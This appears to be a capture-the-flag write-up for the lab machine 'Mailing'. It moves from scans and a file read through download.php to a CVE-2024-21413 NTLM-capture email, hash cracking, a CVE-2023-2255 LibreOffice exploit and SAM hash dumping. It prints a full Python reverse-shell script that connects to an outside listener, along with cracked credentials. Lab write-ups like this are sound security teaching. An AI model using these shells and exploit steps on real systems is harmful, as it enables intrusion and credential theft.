
Directory scan

```
┌──(root㉿kali)-[~]
└─# dirsearch -u http://mailing.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_mailing.htb/__24-08-14_14-13-52.txt

Target: http://mailing.htb/

[14:13:52] Starting:
[14:13:54] 403 - 312B - /%2e%2e//google.com
[14:13:54] 403 - 312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[14:13:54] 404 - 2KB - /.ashx
[14:13:54] 404 - 2KB - /.asmx
[14:14:09] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[14:14:16] 404 - 2KB - /admin%20/
[14:14:16] 404 - 2KB - /admin.
[14:14:27] 404 - 2KB - /asset..
[14:14:27] 200 - 541B - /assets/
[14:14:27] 301 - 160B - /assets -> http://mailing.htb/assets/
[14:14:31] 403 - 312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[14:14:35] 400 - 4KB - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[14:14:35] 200 - 31B - /download.php
[14:14:38] 404 - 2KB - /index.php.
[14:14:40] 404 - 2KB - /javax.faces.resource.../
[14:14:40] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[14:14:40] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[14:14:40] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[14:14:40] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[14:14:40] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[14:14:40] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[14:14:40] 400 - 4KB - /jolokia/exec/java.lang:type=Memory/gc
[14:14:40] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[14:14:40] 400 - 4KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[14:14:40] 400 - 4KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[14:14:40] 400 - 4KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[14:14:40] 400 - 4KB - /jolokia/search/*:j2eeType=J2EEServer,*
[14:14:41] 404 - 2KB - /login.wdm%2e
[14:14:48] 404 - 2KB - /rating_over.
[14:14:49] 404 - 2KB - /service.asmx
[14:14:51] 404 - 2KB - /static..
[14:14:53] 403 - 2KB - /Trace.axd
[14:14:53] 404 - 2KB - /umbraco/webservices/codeEditorSave.asmx
[14:14:54] 404 - 2KB - /WEB-INF./
[14:14:55] 404 - 2KB - /WebResource.axd?d=LER8t9aS

Task Completed
```
```
┌──(root㉿kali)-[~]
└─# feroxbuster -u http://mailing.htb/

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.4
───────────────────────────┬──────────────────────
🎯 Target Url │ http://mailing.htb/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.4
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 94w 1251c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 1l 5w 31c http://mailing.htb/download.php
301 GET 2l 10w 160c http://mailing.htb/assets => http://mailing.htb/assets/
200 GET 3l 25w 541c http://mailing.htb/assets/
200 GET 2932l 17970w 1477653c http://mailing.htb/assets/mayabendito.jpg
200 GET 1144l 5804w 695263c http://mailing.htb/assets/background_image.jpg
301 GET 2l 10w 160c http://mailing.htb/Assets => http://mailing.htb/Assets/
200 GET 2485l 15038w 1505848c http://mailing.htb/assets/ruyalonso.jpg
301 GET 2l 10w 166c http://mailing.htb/instructions => http://mailing.htb/instructions/
200 GET 0l 0w 6066608c http://mailing.htb/assets/johnsmith.jpg
200 GET 132l 375w 4681c http://mailing.htb/
404 GET 0l 0w 1251c http://mailing.htb/assets/PayOnline
404 GET 0l 0w 1251c http://mailing.htb/Assets/disclosures
404 GET 42l 159w 1953c http://mailing.htb/con
404 GET 42l 159w 1960c http://mailing.htb/assets/con
404 GET 0l 0w 1251c http://mailing.htb/instructions/M
404 GET 0l 0w 1251c http://mailing.htb/assets/Impressum
404 GET 0l 0w 1251c http://mailing.htb/_Scripts
404 GET 0l 0w 1251c http://mailing.htb/instructions/case
404 GET 0l 0w 1251c http://mailing.htb/Assets/dis
404 GET 0l 0w 1251c http://mailing.htb/Assets/donation
404 GET 0l 0w 1251c http://mailing.htb/Assets/diy
404 GET 42l 159w 1960c http://mailing.htb/Assets/con
404 GET 42l 159w 1966c http://mailing.htb/instructions/con
301 GET 2l 10w 166c http://mailing.htb/Instructions => http://mailing.htb/Instructions/
404 GET 42l 159w 1953c http://mailing.htb/aux
404 GET 42l 159w 1960c http://mailing.htb/assets/aux
404 GET 42l 159w 1960c http://mailing.htb/Assets/aux
404 GET 0l 0w 1251c http://mailing.htb/Assets/galleria
404 GET 42l 159w 1966c http://mailing.htb/instructions/aux
404 GET 42l 159w 1966c http://mailing.htb/Instructions/con
404 GET 0l 0w 1251c http://mailing.htb/Instructions/_user
404 GET 0l 0w 1251c http://mailing.htb/instructions/simpletest
404 GET 0l 0w 1251c http://mailing.htb/Instructions/_svn
404 GET 0l 0w 1251c http://mailing.htb/instructions/sist
404 GET 0l 0w 1251c http://mailing.htb/Assets/BeheerSjablonen
404 GET 0l 0w 1251c http://mailing.htb/instructions/sit
404 GET 0l 0w 1251c http://mailing.htb/Instructions/_trash
404 GET 0l 0w 1251c http://mailing.htb/Instructions/_users
400 GET 6l 26w 324c http://mailing.htb/error%1F_log
400 GET 6l 26w 324c http://mailing.htb/assets/error%1F_log
400 GET 6l 26w 324c http://mailing.htb/Assets/error%1F_log
404 GET 0l 0w 1251c http://mailing.htb/assets/costasilencio
404 GET 0l 0w 1251c http://mailing.htb/instructions/TeamSpeak
400 GET 6l 26w 324c http://mailing.htb/instructions/error%1F_log
404 GET 42l 159w 1960c http://mailing.htb/assets/prn
404 GET 42l 159w 1953c http://mailing.htb/prn
404 GET 42l 159w 1960c http://mailing.htb/Assets/prn
404 GET 42l 159w 1966c http://mailing.htb/instructions/prn
400 GET 6l 26w 324c http://mailing.htb/Instructions/error%1F_log
404 GET 42l 159w 1966c http://mailing.htb/Instructions/prn
[####################] - 4m 150018/150018 0s found:50 errors:4256
[####################] - 4m 30000/30000 123/s http://mailing.htb/
[####################] - 4m 30000/30000 122/s http://mailing.htb/assets/
[####################] - 4m 30000/30000 122/s http://mailing.htb/Assets/
[####################] - 4m 30000/30000 123/s http://mailing.htb/instructions/
[####################] - 4m 30000/30000 130/s http://mailing.htb/Instructions/
```

Port scan

```
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n -Pn 10.10.11.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-14 14:22 EDT
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 14:22 (0:00:00 remaining)
Nmap scan report for 10.10.11.14
Host is up (0.071s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: UIDL USER TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: ACL IMAP4rev1 CAPABILITY SORT completed IDLE CHILDREN OK RIGHTS=texkA0001 IMAP4 NAMESPACE QUOTA
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
587/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
993/tcp open ssl/imap hMailServer imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_imap-capabilities: ACL IMAP4rev1 CAPABILITY SORT completed IDLE CHILDREN OK RIGHTS=texkA0001 IMAP4 NAMESPACE QUOTA
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-08-14T06:45:59
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: -11h36m38s

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 71.82 ms 10.10.14.1
2 72.61 ms 10.10.11.14

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.58 seconds
```

Clicking the Download button redirects to download.php.


download.php looks like it has an arbitrary file read vulnerability; the files to request are chosen to match the target's operating system (Windows, as the nmap results show).

A quick search gives the location of the hMailServer configuration file:

```
C:\Program Files (x86)\hMailServer\Bin\hMailServer.INI
```


Reading it through download.php returns:


```ini
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1a
```

This yields two password hashes:

```
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
Password=0a9f8ad8bf896b501dde74f08efd7e4c
```

Identify the hash type and crack them:

```
┌──(root㉿kali)-[~]
└─# hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 841bb5acfa6779ae432fd7a4e6600ba7

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
```
```
┌──(root㉿kali)-[~]
└─# hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 0a9f8ad8bf896b501dde74f08efd7e4c

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
```

The first hash cracks successfully:

```
841bb5acfa6779ae432fd7a4e6600ba7:homenetworkingadministrator
```


Try logging in to POP3 over telnet

First, a brief introduction to the commonly used POP3 commands.

Post Office Protocol version 3 (POP3) is a protocol for downloading email from a remote mail server. The common POP3 commands and what they do:

  1. USER <username>
    • Description: specifies the username.
    • Example: USER example
  2. PASS <password>
    • Description: specifies the user's password.
    • Example: PASS password123
  3. STAT
    • Description: returns the number of messages in the mailbox and their total size.
    • Example: STAT
  4. LIST [msg]
    • Description: lists all messages in the mailbox, or the number and size of the specified message.
    • Examples: LIST, LIST 1
  5. RETR <msg>
    • Description: retrieves the content of the specified message.
    • Example: RETR 1
  6. DELE <msg>
    • Description: marks the specified message for deletion; it is not actually removed until the session ends.
    • Example: DELE 1
  7. NOOP
    • Description: no operation; only keeps the connection alive.
    • Example: NOOP
  8. RSET
    • Description: resets the session state, unmarking every message marked for deletion.
    • Example: RSET
  9. QUIT
    • Description: ends the session and closes the connection, removing all messages marked for deletion during the session.
    • Example: QUIT
  10. TOP <msg> <n>
    • Description: retrieves the headers of the specified message plus the first n lines of its body, instead of the whole message.
    • Example: TOP 1 10
  11. UIDL [msg]
    • Description: unique-id listing; returns a unique identifier for each message in the mailbox (or for the specified message).
    • Examples: UIDL, UIDL 1
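As an added illustration (not from the writeup), the following Python models a POP3 server's three states and the commands above over a constructed two-message mailbox, so the semantics that matter when reading a session like the one below are explicit: USER answers +OK whether or not the account exists, DELE only marks, RSET unmarks, and deletions are committed only by QUIT.

```python
import hashlib

# Constructed sample mailbox (not the box's real messages): header block, blank line, body.
SAMPLE_MAILBOX = [
    "From: mailer-daemon@example.test\r\nSubject: Message undeliverable: help\r\n\r\n"
    "Your message did not reach some or all of the intended recipients.\r\n",
    "From: alice@example.test\r\nSubject: hello\r\n\r\nline one\r\nline two\r\nline three\r\n",
]


class Pop3Session:
    """In-memory POP3 server state machine (RFC 1939) for the commands listed above."""
    def __init__(self, users, mailbox):
        self.users = users            # {username: password}, constructed for the demo
        self.msgs = list(mailbox)     # numbered 1..n for the whole TRANSACTION state
        self.user = None
        self.state = "AUTHORIZATION"  # -> TRANSACTION after PASS, -> UPDATE after QUIT
        self.deleted = set()          # DELE only marks; nothing is removed before QUIT

    def _live(self):
        return [(i, m) for i, m in enumerate(self.msgs, 1) if i not in self.deleted]

    def _authorize(self, cmd, arg):
        if self.state == "UPDATE":
            return "-ERR session closed"
        if cmd == "USER":
            self.user = arg                  # same reply whether or not the account exists,
            return "+OK Send your password"  # so USER alone cannot be used to enumerate names
        if cmd == "PASS" and self.user is not None:
            if self.users.get(self.user) == arg:
                self.state = "TRANSACTION"
                return "+OK Mailbox locked and ready"
            return "-ERR invalid user name or password"
        return "-ERR authenticate first"

    def handle(self, line):
        cmd, _, arg = line.strip().partition(" ")
        cmd = cmd.upper()
        if cmd == "QUIT":
            if self.state == "TRANSACTION":  # UPDATE state: deletions become permanent here
                self.msgs = [m for _, m in self._live()]
                self.deleted.clear()
            self.state = "UPDATE"
            return "+OK POP3 server signing off"
        if self.state != "TRANSACTION":
            return self._authorize(cmd, arg)
        live = self._live()
        total = sum(len(m.encode()) for _, m in live)
        if cmd == "STAT":
            return f"+OK {len(live)} {total}"
        if cmd == "RSET":
            self.deleted.clear()             # undo every DELE of this session
            return f"+OK maildrop has {len(self.msgs)} messages"
        if cmd == "LIST":
            rows = [f"{i} {len(m.encode())}" for i, m in live]
            return "\r\n".join([f"+OK {len(live)} messages ({total} octets)"] + rows + ["."])
        if cmd == "UIDL":                    # ids stay valid across sessions, unlike the numbers
            rows = [f"{i} {hashlib.sha1(m.encode()).hexdigest()[:16]}" for i, m in live]
            return "\r\n".join(["+OK"] + rows + ["."])
        if cmd not in ("RETR", "DELE", "TOP"):
            return "-ERR unknown command"
        num, _, n = arg.partition(" ")
        i = int(num) if num.isdigit() else 0
        if not 1 <= i <= len(self.msgs) or i in self.deleted:
            return "-ERR no such message"
        m = self.msgs[i - 1]
        if cmd == "DELE":
            self.deleted.add(i)              # marked only; RETR refuses it until RSET or QUIT
            return f"+OK message {i} deleted"
        if cmd == "RETR":
            return f"+OK {len(m.encode())} octets\r\n{m}."
        headers, _, body = m.partition("\r\n\r\n")   # TOP msg n: headers plus first n body lines
        n = int(n) if n.isdigit() else 0
        return "\r\n".join(["+OK", headers, ""] + body.split("\r\n")[:n] + ["."])
```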
```
telnet 10.10.11.14 110

USER administrator@mailing.htb

PASS homenetworkingadministrator
```
```
┌──(root㉿kali)-[~]
└─# telnet 10.10.11.14 110
Trying 10.10.11.14...
Connected to 10.10.11.14.
Escape character is '^]'.
+OK POP3
USER administrator@mailing.htb
+OK Send your password
PASS homenetworkingadministrator
+OK Mailbox locked and ready
LIST
+OK 2 messages (1634 octets)
1 794
2 840
.
STAT
+OK 2 1634
TOP 1 10
+OK 794 octets
Return-Path:
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Return-Path: <>
Message-ID: <086A6A1E-84F8-4627-960C-0FB697625E26@mailing.htb>
Date: Wed, 14 Aug 2024 06:12:54 +0200
From: mailer-daemon@mailing.htb
To: administrator@mailing.htb
Subject: Message undeliverable: help
Content-Transfer-Encoding: quoted-printable
X-hMailServer-LoopCount: 1

Your message did not reach some or all of the intended recipients.

Sent:=20
Subject: help

The following recipient(s) could not be reached:

gregory@mailing.htb
Error Type: SMTP
Connection to recipients server failed.

.
```

CVE-2024-21413

Nothing exploitable turns up in the mailbox, so look for a relevant CVE instead.


Start a listener locally:

```
┌──(root㉿kali)-[~]
└─# responder -I tun0 -v
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.4.0

To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.50]
Responder IPv6 [dead:beef:4::1030]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
Responder Machine Name [WIN-KX82718DY7A]
Responder Domain Name [32ZA.LOCAL]
Responder DCE-RPC Port [46994]

[+] Listening for events...
```

Send the email:

```
┌──(root㉿kali)-[~/yiyi/cve/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─# python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.12\test' --subject Hi


CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / ah@primepage.de

✅ Email sent successfully.
```

Responder captures the NetNTLMv2 hash:

```
maya::MAILING:5e0eb9256971de1f...
```

Crack it with hashcat

```
┌──(root㉿kali)-[~/tmp]
└─# hashcat -a 0 -m 5600 1.txt /root/yiyi/rockyou.txt -o 2.txt -O
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i9-13980HX, 2159/4382 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 27

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: /root/yiyi/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec


Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: MAYA::MAILING:5e0eb9256971de1f:deba7f01e81351dcfeda...000000
Time.Started.....: Wed Aug 14 05:21:13 2024 (4 secs)
Time.Estimated...: Wed Aug 14 05:21:17 2024 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (/root/yiyi/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1747.3 kH/s (0.79ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5933774/14344385 (41.37%)
Rejected.........: 2766/5933774 (0.05%)
Restore.Point....: 5931726/14344385 (41.35%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: m5478046 -> m4125022
Hardware.Mon.#1..: Util: 68%

Started: Wed Aug 14 05:20:57 2024
Stopped: Wed Aug 14 05:21:18 2024

┌──(root㉿kali)-[~/tmp]
└─# cat 2.txt
MAYA::MAILING:5e0eb9256971de1f:deba7f01e81351dcfeda3c905ca932e8:010100000000000080ba1036359fda01e3495c93763b0b450000000002000800460042005600410001001e00570049004e002d003300410035005400350049004f00550048003800330004003400570049004e002d003300410035005400350049004f0055004800380033002e0046004200560041002e004c004f00430041004c000300140046004200560041002e004c004f00430041004c000500140046004200560041002e004c004f00430041004c000700080080ba1036359fda010600040002000000080030003000000000000000000000000020000080f0d79319e6bb3d505b32f68f03892752bd8dd6272b1fbd42563db8ba2be13a0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310032000000000000000000:m4y4ngs4ri
```

Result:

```
username: maya
password: m4y4ngs4ri
```

evil-winrm

The target has port 5985 open, so log in with evil-winrm.

Port 5985 is the default port of the Windows Remote Management (WinRM) service. WinRM is a remote management protocol used for remote administration and command execution on Windows. Through port 5985 a WinRM connection can be established with the target Windows host to run commands remotely, manage configuration, monitor the system, and so on.

With WinRM we can manage the server remotely even when a firewall is configured, because once the WinRM service is started the firewall allows port 5985 by default. On Windows Server 2012 and later the WinRM service starts automatically; on Windows Vista it must be started manually. The advantage of WinRM is that this kind of remote connection is not easily noticed and does not consume remote desktop session slots.
```
┌──(root㉿kali)-[~/tmp]
└─# evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> whoami
mailing\maya
*Evil-WinRM* PS C:\Users\maya\Documents>
```

The first flag is on the desktop.

Privilege escalation

A LibreOffice installation, version 7.4, is found under Program Files.

The icacls command is used at the Windows command prompt to **view and modify the access control list (ACL) of a file or folder**.

An access control list (ACL) is a list that defines which users or groups hold which access permissions on a specific file or folder.

Main functions of the icacls command:

  • View ACLs: display the ACL of a file or folder, including owner, permissions and inheritance.
  • Modify ACLs: add, remove or change ACL entries of a file or folder, for example adding a new user or group or changing existing permissions.
  • Back up and restore ACLs: save ACLs to a file and restore them from that backup.
  • Inheritance control: control how ACLs are inherited, for example whether a parent directory's ACL propagates to its subdirectories and files.

CVE-2023-2255

```python
# shell.py: the reverse-shell payload run by the CVE-2023-2255 document below
import socket
import subprocess
import threading


def s2p(s, p):
    # copy whatever arrives on the socket into the cmd process's stdin
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)
            p.stdin.flush()


def p2s(s, p):
    # copy the cmd process's output back to the socket one byte at a time
    while True:
        s.send(p.stdout.read(1))


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.12", 9100))  # listener address from the writeup

p = subprocess.Popen(["cmd"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)

s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()
```

Upload the shell script to the desktop, then run the CVE-2023-2255 PoC to generate the document:

```
python3 CVE-2023-2255.py --cmd "python C:\Users\maya\Desktop\shell.py" --output 'exploit.odt'
```

This yields an administrator shell.

Add the maya user to the Administrators group.

```
crackmapexec smb 10.10.11.14 -u maya -p "m4y4ngs4ri" --sam
```

Use crackmapexec to dump the SAM hashes:

```
SMB 10.10.11.14 445 MAILING [*] Windows 10.0 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.10.11.14 445 MAILING [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB 10.10.11.14 445 MAILING [+] Dumping SAM hashes
SMB 10.10.11.14 445 MAILING Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.11.14 445 MAILING Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.11.14 445 MAILING DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.11.14 445 MAILING WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB 10.10.11.14 445 MAILING localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB 10.10.11.14 445 MAILING maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB 10.10.11.14 445 MAILING [+] Added 6 SAM hashes to the database
```

Log in directly as localadmin with evil-winrm.